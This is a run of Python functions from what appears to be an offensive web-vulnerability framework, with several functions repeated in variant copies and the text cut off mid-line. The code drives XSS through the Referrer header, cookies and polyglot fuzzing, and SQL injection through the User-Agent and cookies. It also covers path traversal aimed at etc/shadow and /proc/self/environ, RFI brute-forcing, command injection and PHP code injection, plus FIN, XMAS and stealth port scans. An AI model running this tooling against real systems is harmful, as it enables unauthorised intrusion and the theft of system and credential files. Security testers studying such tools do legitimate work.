def xssref0x00(web, parallel): #print(R+'\n ===========================') print(R + '\n X S S (Referrer Based)') print(R + ' ---<>----<>----<>----<>----\n') success = [] if not parallel: success += refatck(pay, web) else: paylists = listsplit(pay, round(len(pay) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(refatck, args=( l, web, )) for l in paylists ] for y in res: i = y.get() success += i if success: data = "XSS Vulnerability (Referrer) found! Payloads :> " + str( success) save_data(database, module, lvl1, lvl2, lvl3, name, data) print( " [+] XSS Vulnerability (Referrer) found! Successful payloads:" ) for i in success: print(i) else: data = "(referrer) no payload succeeded." save_data(database, module, lvl1, lvl2, lvl3, name, data) print(R + "\n [-] No payload succeeded." + C)
def xsspoly0x00(li, bug2, parallel): success = [] #print(R+'\n ==========================') print(R + '\n X S S (Polyglot Fuzzer)') print(R + ' ——·‹›·––·‹›·——·‹›·——·‹›·––\n') try: if '?' in str(li) and '=' in str(li): if not parallel: success += polyatck(poly, li, bug2) else: paylists = listsplit(poly, round(len(poly) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(polyatck, args=( l, li, bug2, )) for l in paylists ] for y in res: i = y.get() success += i if success: print( " [+] XSS Vulnerability (Polyglot) found! Successful payloads:" ) for i in success: print(i) else: print(R + "\n [-] No payload succeeded." + C) except KeyboardInterrupt: print(R + ' [+] Polyglot Payloads File does not exist!')
def atck(evasion, filepath, payloads, web00, bug2, parallel, gen_headers): gotcha = [] loggy = [] enviro = [] fud = [] generic = [] cnfy = [] if not parallel: for pay in payloads: if evasion and filepath != "": pay = pay.replace("etc/shadow", filepath) print(GR + '\n [*] Setting parameters...') web0x00 = web00 + pay + bug2 print(C + ' [+] Using path : ' + B + str(pay)) print(B + ' [+] Url : ' + GR + str(web0x00)) paths = check0x00(web0x00, pay, gen_headers) gotcha += paths[0] generic += paths[1] loggy += paths[2] enviro += paths[3] fud += paths[4] cnfy += paths[5] else: print(round(len(payloads) / processes)) paylists = listsplit(payloads, round(len(payloads) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(chkpre, args=( evasion, filepath, l, web00, bug2, gen_headers, )) for l in paylists ] #res1 = pool.apply_async(portloop, ) for i in res: paths = i.get() gotcha += paths[0] generic += paths[1] loggy += paths[2] enviro += paths[3] fud += paths[4] cnfy += paths[5] if gotcha: print(G + "\n [+] Retrieved %s interesting paths...\n" % str(len(gotcha))) time.sleep(0.5) outto0x00("Logs", loggy) outto0x00("/proc/self/environ", enviro) outto0x00("/proc/self/fd", fud) outto0x00("Configuration", cnfy) outto0x00("Generic", generic) else: print(R + ' [-] No vulnerable paths found!')
def sqliuser0x00(web, parallel): #print(R+'\n =============================') print(R+'\n S Q L i (User-Agent Based)') print(R+' ––·‹›·––·‹›·––·‹›·––·‹›·––·‹›\n') requests = session() getrq = requests.get(web, verify=False) success = [] if not parallel: for i in pay: print(B+'\n [*] Using payload : '+C+i) time.sleep(0.7) user_agent = {'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux' + 'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'} user_agent['User-agent'] += str(i) req = requests.get(web, headers=user_agent, verify=False) print(O+' [*] Using '+R+'!nfected'+O+' UA : '+GR+user_agent['User-agent']) if len(req.content) != len(getrq.content): print(G+' [!] Blind based SQLi (User-Agent Based) Detected!') print(R+' [!] User-Agent : '+O+user_agent['User-agent']) else: paylists = listsplit(pay, round(len(pay)/processes)) with Pool(processes=processes) as pool: res = [pool.apply_async(userpre, args=(web,l,getrq,)) for l in paylists] #res1 = pool.apply_async(portloop, ) for i in res: j = i.get() success += j if success: print(" [+] SQLi Vulnerability (Cookie) found! Successful payloads:") for i in success: print(i) else: print(R + "\n [-] No payload succeeded."+C)
def xssref0x00(web, parallel): #print(R+'\n ===========================') print(R + '\n X S S (Referrer Based)') print(R + ' ——·‹›·––·‹›·——·‹›·——·‹›·––·\n') success = [] if not parallel: success += refatck(pay, web) else: paylists = listsplit(pay, round(len(pay) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(refatck, args=( l, web, )) for l in paylists ] for y in res: i = y.get() success += i if success: print( " [+] XSS Vulnerability (Referrer) found! Successful payloads:" ) for i in success: print(i) else: print(R + "\n [-] No payload succeeded." + C)
def xsscookie0x00(web, parallel): #print(R+'\n =======================') print(R+'\n X S S (Cookie Based)') print(R+' ——·‹›·––·‹›·——·‹›·——·‹›\n') sleep(0.5) vsession = session() vsession.get(web) if vsession.cookies: print(G+' [+] This website supports session cookies...') success = [] if not parallel: success += cookieatck(pay, vsession, web) else: paylists = listsplit(pay, round(len(pay)/processes)) with Pool(processes=processes) as pool: res = [pool.apply_async(cookieatck, args=(l,vsession,web,)) for l in paylists] for y in res: i = y.get() success += i if success: print(" [+] XSS (Cookie) Vulnerability found! Successful payloads:") for i in success: print(i) else: print(R + "\n [-] No payload succeeded."+C) else: print(R+' [-] No support for cookies...') time.sleep(0.5) print(R+' [-] Cookie based injection not possible...')
def manual0x00(web, parallel): #print(R+'\n ======================') print(R + '\n X S S (Manual Mode)') print(R + ' ——·‹›·––·‹›·——·‹›·––·‹\n') bug = input(O + ' [#] Injectable Endpoint' + R + ' (eg. /xss/search.php?q=drake)' + O + ' :> ') choice = "" if "&" in bug: ln = len(bug.split("&")) choice = input( " [!] Discovered {} parameters. Which one to use? (enter name) :> " .format(ln)) if not choice in bug: sys.exit(" [-] Param {} not found.".format(choice)) bugs = web + bug.split(choice + '=')[0] + choice + '=' bug2 = "" if choice != "": n = bug.split(choice + "=")[1] if "&" in n: bug2 = bug.split(choice)[1] tmp = bug2.split("&")[0] bug2 = bug2.replace(tmp, "") print(O + ' [!] Using Url : ' + GR + bugs + "INJECT" + bug2) if '?' in str(bugs) and '=' in str(bugs): success = [] if not parallel: manualatck(pay, bugs, bug2) else: paylists = listsplit(pay, round(len(pay) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(manualatck, args=( l, bugs, bug2, )) for l in paylists ] for y in res: i = y.get() success += i if success: print(" [+] XSS Vulnerability found! Successful payloads:") for i in success: print(i) else: print(R + "\n [-] No payload succeeded." + C) x = input(O + ' [#] Test Polyglots? (Y/n) :> ') if x == 'Y' or x == 'y': print(GR + ' [*] Proceeding fuzzing with polyglots...') xsspoly0x00(bugs, bug2, parallel) elif x == 'n' or x == 'N': print(C + ' [+] Okay!') else: print(GR + ' [-] U high dude?') else: print(R + ' [-] Enter an URL with scope parameter...') manual0x00(web, parallel)
def sqlicookie0x00(web, parallel): #print(R+'\n =========================') print(R + '\n S Q L i (Cookie Based)') print(R + ' ––·‹›·––·‹›·––·‹›·––·‹›·–\n') sleep(0.5) vsession = session() req = vsession.get(web) check = ["have an error", "SQL syntax", "MySQL"] if vsession.cookies: print(G + ' [+] This website values session cookies...') success = [] if not parallel: for i in pay: print(B + " [*] Trying Payload : " + C + '' + i) time.sleep(0.7) for cookie in vsession.cookies: cookie.value += i print(O + ' [+] Using ' + R + '!nfected' + O + ' cookie : ' + GR + cookie.value) r = vsession.get(web) for j in range(0, len(check)): if check[j] in r.text: poc = C + " [+] PoC : " + O + cookie.name + " : " + GR + cookie.value print( G + " [+] Error Based SQli (Cookie Based) Detected! " ) print(poc) print(P + ' [+] Code : ' + W + str(r.text) + '\n') success.append(i) else: paylists = listsplit(pay, round(len(pay) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(cookiepre, args=( l, vsession, check, req, )) for l in paylists ] #res1 = pool.apply_async(portloop, ) for i in res: j = i.get() success += j if success: print(" [+] SQLi Vulnerability found! Successful payloads:") for i in success: print(i) else: print(R + "\n [-] No payload succeeded." + C) else: print(R + ' [-] No support for cookies...') time.sleep(0.5) print(R + ' [-] Cookie based injection not possible...')
def manual0x00(web, parallel): #print(R+'\n ========================') print(R+'\n S Q L i (Manual Mode)') print(R+' ––·‹›·––·‹›·––·‹›·––·‹›·\n') requests = session() bug = input(O+' [#] Injectable Endpoint'+R+' (eg. /sqli/fetch.php?id=x)'+O+' :> ') choice = "" if "&" in bug: ln = len(bug.split("&")) choice = input(" [!] Discovered {} parameters. Which one to use? (enter name) :> ".format(ln)) if not choice in bug: sys.exit(" [-] Param {} not found.".format(choice)) bug2 = "" param1 = "" if choice != "": n = bug.split(choice + "=")[1] if "&" in n: bug2 = bug.split(choice+"=")[1] param1 = bug2.split("&")[0] bug2 = bug2.replace(param1,"") bugs = web + bug.split(choice + '=')[0] + choice + '=' + param1 print(O+' [!] Using Url : '+GR+bugs) if '?' in str(bugs) and '=' in str(bugs): success = [] if not parallel: for p in pay: bugged = bugs + str(p) + bug2 print(B+" [*] Trying : "+C+bugged) time.sleep(0.7) response = requests.get(bugged).text if (('error' in response) and ('syntax' in response) and ('SQL' in response) or ('Warning:' in response)): print('\n'+G+' [+] Vulnerable link detected : ' + bugged) print(GR+' [*] Injecting payloads...') print(B+' [!] PoC : ' + str(bugged)) print(R+" [!] Payload : " + O + p + '\033[0m') print("\033[1m [!] Code Snippet :\n \033[0m" + str(response) + '\n') else: paylists = listsplit(pay, round(len(pay)/processes)) with Pool(processes=processes) as pool: res = [pool.apply_async(manualpre, args=(l,bugs,bug2,)) for l in paylists] #res1 = pool.apply_async(portloop, ) for i in res: j = i.get() success += j if success: print(" [+] SQLi Vulnerability found! Successful payloads:") for i in success: print(i) else: print(R + "\n [-] No payload succeeded."+C) else: print(R+' [-] Enter an URL with scope parameter...') manual0x00(web, parallel)
def sqliuser0x00(web, parallel): #print(R+'\n =============================') print(R + '\n S Q L i (User-Agent Based)') print(R + ' ---<>----<>----<>----<>----<>\n') success = [] requests = session() if not parallel: for i in pay: print(B + ' [*] Using payload : ' + C + i) time.sleep(0.7) user_agent = { 'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux' + 'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0' } user_agent['User-agent'] += i req = requests.get(web, headers=user_agent) print(O + ' [*] Using ' + R + '!nfected' + O + ' UA : ' + GR + user_agent['User-agent']) #flag = u' '.join(req.text).encode('utf-8').strip() flag = " ".join(req.text).strip() if 'error' in flag or 'syntax' in flag or 'MySQL'.lower( ) in flag.lower(): print( G + '\n [!] Error based SQLi (User-Agent Based) Detected!') print(R + ' [!] User-Agent : ' + O + user_agent['User-agent']) success.append(i) else: paylists = listsplit(pay, round(len(pay) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(userpre, args=( l, web, )) for l in paylists ] #res1 = pool.apply_async(portloop, ) for i in res: j = i.get() success += j if success: data = "SQLi Vulnerability (useragent) found!\nSuccessful payloads: " + str( success) save_data(database, module, lvl1, lvl2, lvl3, name, data) print( " [+] SQLi Vulnerability (useragent) found! Successful payloads:" ) for i in success: print(i) else: print(R + "\n [-] No payload succeeded." + C) save_data(database, module, lvl1, lvl2, lvl3, name, "(useragent) no payload succeeded.")
def brute0x00(web, parallel): try: if properties["DICT"][1] == " ": print(O + ' [!] Enter path to payload file ' + R + '(Default: files/fuzz-db/rfi_paths.lst)') fi = input(O + ' [§] Your input (Press Enter if default) :> ') elif properties["DICT"][1].lower() == "none": fi = "" else: fi = properties["DICT"][1] if fi == '': fi = 'files/fuzz-db/rfi_paths.lst' print(GR + ' [*] Importing wordlist...') if os.path.exists(fi) == True: print(G + ' [+] File path found!') time.sleep(0.6) print(O + ' [*] Importing wordlist...') with open(fi, 'r') as wew: for w in wew: w = w.strip('\n') payloads.append(w) print(GR + ' [*] Starting bruteforce...') time.sleep(0.7) success = [] if not parallel: success += checkbrute(payloads, web) else: paylists = listsplit(payloads, round(len(payloads) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(checkbrute, args=( l, web, )) for l in paylists ] for y in res: i = y.get() success += i if success: data = "Possible RFI at: " + str(success) save_data(database, module, lvl1, lvl2, lvl3, name, data) print(" [+] Remote File Inclusion found! Successful payloads:") for i in success: print(i) else: print(R + "\n [-] No payload succeeded." + C) save_data(database, module, lvl1, lvl2, lvl3, name, "(brute) no payload succeeded.") except Exception as e: print(R + ' [-] Unexpected Exception Encountered!') print(R + ' [-] Exception : ' + str(e))
def getPayloads(url, parallel): if properties["DICT"][1] == " ": print(O + ' [!] Enter path to payload file ' + R + '(Default: files/payload-db/rce_payloads.lst)') fi = input(O + ' [§] Your input (Press Enter if default) :> ') elif properties["DICT"][1].lower() == "none": fi = "" else: fi = properties["DICT"][1] if fi == '': fi = 'files/payload-db/rce_payloads.lst' print(GR + ' [*] Loading payloads...') time.sleep(0.8) try: with open(fi) as run: for p in run: p = p.replace('\n', '') p = r'%s' % p payloads.append(p) except Exception as e: print(R + ' [-] Exception: ' + str(e)) print(G + ' [+] ' + str(len(payloads) + 1) + ' Payloads loaded!') check = re.compile( "51107ed95250b4099a0f481221d56497|Linux|eval\(\)|SERVER_ADDR|Volume.+Serial|\[boot|root|x:bin", re.I) print(GR + ' [*] Starting command injection testing...') success = [] if not parallel: check0x00(url, payloads, check) else: paylists = listsplit(payloads, round(len(payloads) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(check0x00, args=( url, l, check, )) for l in paylists ] for y in res: i = y.get() success += i if success: print(" [+] CMDi Vulnerability found! Successful payloads:") for i in success: print(i) else: print(R + "\n [-] No payload succeeded." + C)
def xsscookie0x00(web, parallel): #print(R+'\n =======================') print(R + '\n X S S (Cookie Based)') print(R + ' ---<>----<>----<>----<>\n') sleep(0.5) vsession = session() vsession.get(web) if vsession.cookies: print(G + ' [+] This website supports session cookies...') success = [] if not parallel: success += cookieatck(pay, vsession, web) else: paylists = listsplit(pay, round(len(pay) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(cookieatck, args=( l, vsession, web, )) for l in paylists ] for y in res: i = y.get() success += i if success: data = "XSS Vulnerability (Cookie) found! Payloads :> " + str( success) save_data(database, module, lvl1, lvl2, lvl3, name, data) print( " [+] XSS (Cookie) Vulnerability found! Successful payloads:" ) for i in success: print(i) else: data = "(cookie) no payload succeeded." save_data(database, module, lvl1, lvl2, lvl3, name, data) print(R + "\n [-] No payload succeeded." + C) else: print(R + ' [-] No support for cookies...') time.sleep(0.5) print(R + ' [-] Cookie based injection not possible...') data = "No support for cookies. Cookie based injection not possible." save_data(database, module, lvl1, lvl2, lvl3, name, data)
def scan0x00(target): try: from core.methods.print import pscan pscan("fin scan") #print(''+R+'\n =================') #print(''+R + ' F I N S C A N ') #print(''+R + ' =================') print(''+R + ' [Reliable only in LA Networks]\n') if properties["INIT"][1] == " ": min_port = input(C+' [§] Enter initial port :> ') else: min_port = properties["INIT"][1] if properties["FIN"][1] == " ": max_port = input(C+' [§] Enter ending port :> ') else: max_port = properties["FIN"][1] openfil_ports = [] filter_ports = [] closed_ports = [] ip_host = socket.gethostbyname(target) if properties["VERBOSE"][1] == " ": chk = input(C+' [?] Do you want a verbose output? (enter if not) :> ') verbose = chk != "" else: verbose = properties["VERBOSE"][1] == "1" try: print(GR+' [*] Checking port range...') if int(min_port) >= 0 and int(max_port) >= 0 and int(max_port) >= int(min_port) and int(max_port) <= 65536: print(P+' [!] Port range detected valid...'+C) time.sleep(0.3) print(GR+' [*] Preparing for the the FIN Scan...') pass else: # If range didn't raise error, but didn't meet criteria print(R+"\n [!] Invalid Range of Ports") print(R+" [!] Exiting...") quit() except Exception: # If input range raises an error print(R+"\n [!] Invalid Range of Ports") print(R+" [!] Exiting...") quit() ports = range(int(min_port), int(max_port)+1) # Build range from given port numbers starting_time = time.time() # Start clock for scan time checkhost(ip_host) # Run checkhost() function from earlier print(G+" [!] Scanning initiated at " + strftime("%H:%M:%S") + "!"+C+color.TR2+C+"\n") # Confirm scan start prtlst = listsplit(ports, round(len(ports)/processes)) with Pool(processes=processes) as pool: res = [pool.apply_async(portloop, args=(l,verbose,ip_host,)) for l in prtlst] #res1 = pool.apply_async(portloop, ) for i in res: j = i.get() openfil_ports += j[0] closed_ports += j[1] filter_ports += j[2] print(G+"\n [!] Scanning completed at %s" %(time.strftime("%I:%M:%S %p"))+C+color.TR2+C) ending_time = time.time() total_time = ending_time - starting_time print(P+' [*] Preparing report...\n'+C) time.sleep(1) openports = " {}{}{}{}{}{}{}{} ports open.".format(color.TR5,C, G, str(len(openfil_ports)), color.END, color.TR2, color.END, color.CURSIVE) summary("finscan", openports) print() print(P+' +--------+------------------+') print(P+' | '+C+'PORT '+P+'| '+C+'STATE '+P+'|') print(P+' +--------+------------------+') if openfil_ports: for i in sorted(openfil_ports): c = str(i) if len(c) == 1: print(P+' | '+C+c+P+' | '+C+'OPEN '+P+'|') print(P+' +--------+------------------+') time.sleep(0.2) elif len(c) == 2: print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'|') print(P+' +--------+------------------+') time.sleep(0.2) elif len(c) == 3: print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'|') print(P+' +--------+------------------+') time.sleep(0.2) elif len(c) == 4: print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'|') print(P+' +--------+------------------+') time.sleep(0.2) elif len(c) == 5: print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'|') print(P+' +--------+------------------+') time.sleep(0.2) data = "Open Ports: " + str(openfil_ports) save_data(database, module, lvl1, lvl2, lvl3, name, data) if filter_ports: for i in sorted(filter_ports): c = str(i) if len(c) == 1: print(P+' | '+C+c+P+' | '+C+'FILTERED '+P+'|') print(P+' +--------+------------------+') time.sleep(0.2) elif len(c) == 2: print(P+' | '+C+c+' '+P+'| '+C+'FILTERED '+P+'|') print(P+' +--------+------------------+') time.sleep(0.2) elif len(c) == 3: print(P+' | '+C+c+' '+P+'| '+C+'FILTERED '+P+'|') print(P+' +--------+------------------+') time.sleep(0.2) elif len(c) == 4: print(P+' | '+C+c+' '+P+'| '+C+'FILTERED '+P+'|') print(P+' +--------+------------------+') time.sleep(0.2) elif len(c) == 5: print(P+' | '+C+c+' '+P+'| '+C+'FILTERED '+P+'|') print(P+' +--------+------------------+') time.sleep(0.2) data = "Filtered Ports: " + str(filter_ports) save_data(database, module, lvl1, lvl2, lvl3, name, data) print('') else: print(''+R+" [-] No open/filtered ports found.!!"+'') save_data(database, module, lvl1, lvl2, lvl3, name, "No open/filtered ports found.") print(B+"\n [!] " + str(len(closed_ports)) + ' closed ports not shown') print(G+" [+] Host %s scanned in %s seconds" %(target, total_time)+C+color.TR2+C+"\n") except KeyboardInterrupt: print(R+"\n [-] User Requested Shutdown...") print(" [*] Exiting...") quit()
def scan0x00(target): try: #print(R+'\n ===================') #print(R+' X M A S S C A N ') #print(R+' ===================\n') from core.methods.print import pscan pscan("xmas scan") print(R + ' [Reliable only in LA Networks]\n') min_port = input(O + " [#] Enter Minumum Port Number -> ") max_port = input(O + " [#] Enter Maximum Port Number -> ") openfil_ports = [] filter_ports = [] closed_ports = [] ip_host = socket.gethostbyname(target) chk = input(C + ' [#] Do you want a verbose output? (enter if not) :> ') verbose = chk is not "" try: print(GR + ' [*] Checking port range...') if int(min_port) >= 0 and int(max_port) >= 0 and int( max_port) >= int(min_port) and int(max_port) <= 65536: print(G + '\033[1;32m [+] Port range detected valid...') time.sleep(0.3) print(GR + ' [*] Preparing for the the FIN Scan...') pass else: print(R + "\n [!] Invalid Range of Ports") print(" [!] Exiting...") quit() except Exception: # If input range raises an error print("\n\033[91m [!] Invalid Range of Ports") print(" [!] Exiting...") quit() ports = range(int(min_port), int(max_port) + 1) # Build range from given port numbers prtlst = listsplit(ports, round(len(ports) / processes)) starting_time = time.time() # Start clock for scan time SYNACK = 0x12 # Set flag values for later reference RSTACK = 0x14 def checkhost(ip): # Function to check if target is up conf.verb = 0 # Hide output try: ping = sr1(IP(dst=ip) / ICMP()) # Ping the target print("\n\033[1;32m [!] Target server detected online...") time.sleep(0.6) print(' [*] Beginning scan...') except Exception: # If ping fails print("\n\033[91m [!] Couldn't Resolve Target") print(" [!] Exiting...") quit() checkhost(ip_host) # Run checkhost() function from earlier print(G + " [*] Scanning initiated at " + strftime("%H:%M:%S") + "!\n") # Confirm scan start with Pool(processes=processes) as pool: res = [ pool.apply_async(portloop, args=( l, verbose, ip_host, )) for l in prtlst ] #res1 = pool.apply_async(portloop, ) for i in res: j = i.get() openfil_ports += j[0] filter_ports += j[1] closed_ports += j[2] print("\n [!] Scanning completed at %s" % (time.strftime("%I:%M:%S %p"))) ending_time = time.time() total_time = ending_time - starting_time print(GR + ' [*] Preparing report...\n') time.sleep(1) #print(O+' +-------------+') #print(O+' | '+R+'SCAN REPORT '+O+'|') print(O + ' ' + R + 'SCAN REPORT ' + O + ' ') #print(O+' +-------------+') print(O + ' ––·‹›·––·‹›·–––') #print(O+' |') print() print(O + ' +--------+------------------+') print(O + ' | ' + GR + 'PORT ' + O + '| ' + GR + 'STATE ' + O + '|') print(O + ' +--------+------------------+') if openfil_ports: for i in sorted(openfil_ports): c = str(i) if len(c) == 1: print(O + ' | ' + C + c + O + ' | ' + G + 'OPEN ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 2: print(O + ' | ' + C + c + ' ' + O + '| ' + G + 'OPEN ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 3: print(O + ' | ' + C + c + ' ' + O + '| ' + G + 'OPEN ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 4: print(O + ' | ' + C + c + ' ' + O + '| ' + G + 'OPEN ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 5: print(O + ' | ' + C + c + ' ' + O + '| ' + G + 'OPEN ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) if filter_ports: for i in sorted(filter_ports): c = str(i) if len(c) == 1: print(O + ' | ' + C + c + O + ' | ' + GR + 'FILTERED ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 2: print(O + ' | ' + C + c + ' ' + O + '| ' + GR + 'FILTERED ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 3: print(O + ' | ' + C + c + ' ' + O + '| ' + GR + 'FILTERED ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 4: print(O + ' | ' + C + c + ' ' + O + '| ' + GR + 'FILTERED ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 5: print(O + ' | ' + C + c + ' ' + O + '| ' + GR + 'FILTERED ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) else: print('' + R + " [-] No filtered ports found.!!" + O + '') print(B + "\n [!] " + str(len(closed_ports)) + ' closed ports not shown') print(O + " [!] Host %s scanned in %s seconds\n" % (target, total_time)) except KeyboardInterrupt: # In case the user wants to quit print("\n\033[91m [*] User Requested Shutdown...") print(" [*] Exiting...") quit()
def scan0x00(target): try: #print(R+'\n =================================') #print(R+' T C P S T E A L T H S C A N ') #print(R+' =================================\n') from core.methods.print import pscan pscan("tcp stealth scan") if properties["INIT"][1] == " ": min_port = input(O + ' [#] Enter initial port :> ') else: min_port = properties["INIT"][1] if properties["FIN"][1] == " ": max_port = input(O + ' [#] Enter ending port :> ') else: max_port = properties["FIN"][1] open_ports = [] closed_ports = [] ip_host = socket.gethostbyname(target) if properties["VERBOSE"][1] == " ": chk = input( C + ' [#] Do you want a verbose output? (enter if not) :> ') verbose = chk is not "" else: verbose = properties["VERBOSE"][1] == "1" try: print(GR + ' [*] Checking port range...') if int(min_port) >= 0 and int(max_port) >= 0 and int( max_port) >= int(min_port) and int(max_port) <= 65536: print('\033[1;32m [!] Port range detected valid...') time.sleep(0.3) print(GR + ' [*] Preparing for the the Scan...') pass else: print("\n\033[91m [!] Invalid Range of Ports") print(" [!] Exiting...") quit() except Exception: print("\n\033[91m [!] Invalid Range of Ports") print(" [!] Exiting...") quit() ports = range(int(min_port), int(max_port) + 1) prtlst = listsplit(ports, round(len(ports) / processes)) starting_time = time.time() SYNACK = 0x12 RSTACK = 0x14 checkhost(target) print(O + " [*] Scanning initiated at " + strftime("%H:%M:%S") + "!\n") with Pool(processes=processes) as pool: res = [ pool.apply_async(portloop, args=( l, verbose, ip_host, )) for l in prtlst ] #res1 = pool.apply_async(portloop, ) for i in res: j = i.get() open_ports += j[0] closed_ports += j[1] print(O + "\n [!] Scanning completed at %s" % (time.strftime("%I:%M:%S %p"))) ending_time = time.time() total_time = ending_time - starting_time print(GR + ' [*] Preparing report...\n') time.sleep(1) print(O + ' ——·+-------------+') print(O + ' [ SCAN REPORT ] stealthscan') print(O + ' +-------------+ --------------') print(O + ' ') print(O + ' +--------+------------------+') print(O + ' | ' + GR + 'PORT ' + O + '| ' + GR + 'STATE ' + O + '|') print(O + ' +--------+------------------+') if open_ports: for i in sorted(open_ports): c = str(i) if len(c) == 1: print(O + ' | ' + C + c + O + ' | ' + G + 'OPEN ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 2: print(O + ' | ' + C + c + ' ' + O + '| ' + G + 'OPEN ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 3: print(O + ' | ' + C + c + ' ' + O + '| ' + G + 'OPEN ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 4: print(O + ' | ' + C + c + ' ' + O + '| ' + G + 'OPEN ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 5: print(O + ' | ' + C + c + ' ' + O + '| ' + G + 'OPEN ' + O + '|') print(O + ' +--------+------------------+') time.sleep(0.2) else: print('' + R + " [-] Sorry, No open ports found.!!") print(O + '\n [!] ' + str(len(closed_ports)) + ' closed ports not shown') print(C + " [!] Host %s scanned in %s seconds" % (target, total_time)) except KeyboardInterrupt: print(R + "\n [-] User Requested Shutdown...") print(" [*] Exiting...") quit()
def phpi(web): global name name = targetname(web) global lvl2 lvl2 = inspect.stack()[0][3] global module module = "VulnAnalysis" global lvl1 lvl1 = "Critical Vulnerabilities" global lvl3 lvl3 = "" time.sleep(0.5) #print(R+'\n =====================================') #print(R+'\n P H P C O D E I N J E C T I O N') #print(R+' ---<>----<>----<>----<>----<>----<>--\n') from core.methods.print import pvln pvln("php code Injection") gen_headers = { 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201', 'Accept-Language': 'en-US;', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/php, application/xhtml+xml, application/xml;', # important -> text/php 'Connection': 'close' } print(GR + ' [*] Initiating ' + R + 'Parameter Based Check...') if properties["PARAM"][1] == " ": param = input(O + ' [§] Scope parameter (eg. /vuln/page.php?q=lmao) :> ') else: param = properties["PARAM"][1] if param.startswith('/') == False: param = '/' + param choice = "" if "&" in param: ln = len(param.split("&")) choice = input( " [!] Discovered {} parameters. Which one to use? (enter name) :> " .format(ln)) if not choice in param: sys.exit(" [-] Param {} not found.".format(choice)) bug2 = "" if choice != "": n = param.split(choice + "=")[1] if "&" in n: bug2 = param.split(choice)[1] tmp = bug2.split("&")[0] bug2 = bug2.replace(tmp, "") if properties["PARALLEL"][1] == " ": pa = input("\n [?] Parallelise Attack? (enter if not) :> ") parallel = pa != "" else: parallel = properties["PARALLEL"][1] == "1" getFile0x00() # get the file with payloads web00 = web + param.split(choice + '=')[0] + choice + '=' try: success = [] if not parallel: for pay in payloads: print(GR + '\n [*] Setting parameters...') web0x00 = web00 + pay + bug2 print(C + ' [+] Using payload : ' + B + str(pay)) print(B + ' [+] Using !nfected Url : ' + GR + str(web0x00)) # display whats going on success += check0x00( web0x00, pay, gen_headers) # check the outupt of the fuzz else: paylists = listsplit(payloads, round(len(payloads) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(checkpre, args=( l, web00, bug2, gen_headers, )) for l in paylists ] for y in res: i = y.get() success += i if success: data = "CRLF Injection Vulnerability found!\nVulnerable param: " + web00 + "\nPayloads: " + str( success) save_data(database, module, lvl1, lvl2, lvl3, name, data) print(" [+] PHPi Vulnerability found! Successful payloads:") for i in success: print(i) else: print(R + "\n [-] No payload succeeded." + C) save_data(database, module, lvl1, lvl2, lvl3, name, "No payload succeeded.") except Exception as e: # if error print(R + ' [-] Unexpected Exception Encountered!') print(R + ' [-] Exception : ' + str(e)) print(G + '\n [+] PHPi Module Completed!')
def scan0x00(host): #print(R+'\n =========================') #print(R+' P O R T S C A N N E R') #print(R+' =========================\n') from core.methods.print import pscan pscan("port scanner") print(GR + ' [*] Using most common ports...') ports = [ 20, 21, 23, 25, 53, 67, 68, 69, 80, 109, 110, 111, 123, 137, 143, 156, 161, 162, 179, 389, 443, 445, 512, 513, 546, 547, 636, 993, 995, 1099, 2121, 2049, 3306, 5432, 5900, 6000, 6667, 8080, 8180, 8443, 10000 ] mlprts = listsplit(ports, round(len(ports) / processes)) #print(mlprts) print(C + ' [+] Scanning %s ports...' % len(ports)) try: ip = socket.gethostbyname(host) print(G + '\n [+] Target server detected up and running...' + C + color.TR2 + C) print(O + ' [*] Preparing for scan...' + C) pass except Exception: print(R + ' [-] Server not responding...') time.sleep(0.3) print(R + ' [*] Exiting...') quit() open_ports = [] closed_ports = [] print(G + " [*] Scanning started at %s" % (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C) starting_time = time.time() try: print(O + " [*] Scan in progress.." + C) time.sleep(0.8) with Pool(processes=processes) as pool: res = [ pool.apply_async(portloop, args=( l, host, )) for l in mlprts ] #res1 = pool.apply_async(portloop, ) for i in res: j = i.get() open_ports += j[0] closed_ports += j[1] print(G + "\n [+] Scanning completed at %s" % (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C) ending_time = time.time() total_time = ending_time - starting_time print(P + ' [*] Preparing report...\n' + C) time.sleep(1) openports = " {}{}{}{}{}{}{}{} ports open.".format( color.TR5, C, G, str(len(open_ports)), color.END, color.TR2, color.END, color.CURSIVE) summary("simpleport", openports) print() print(P 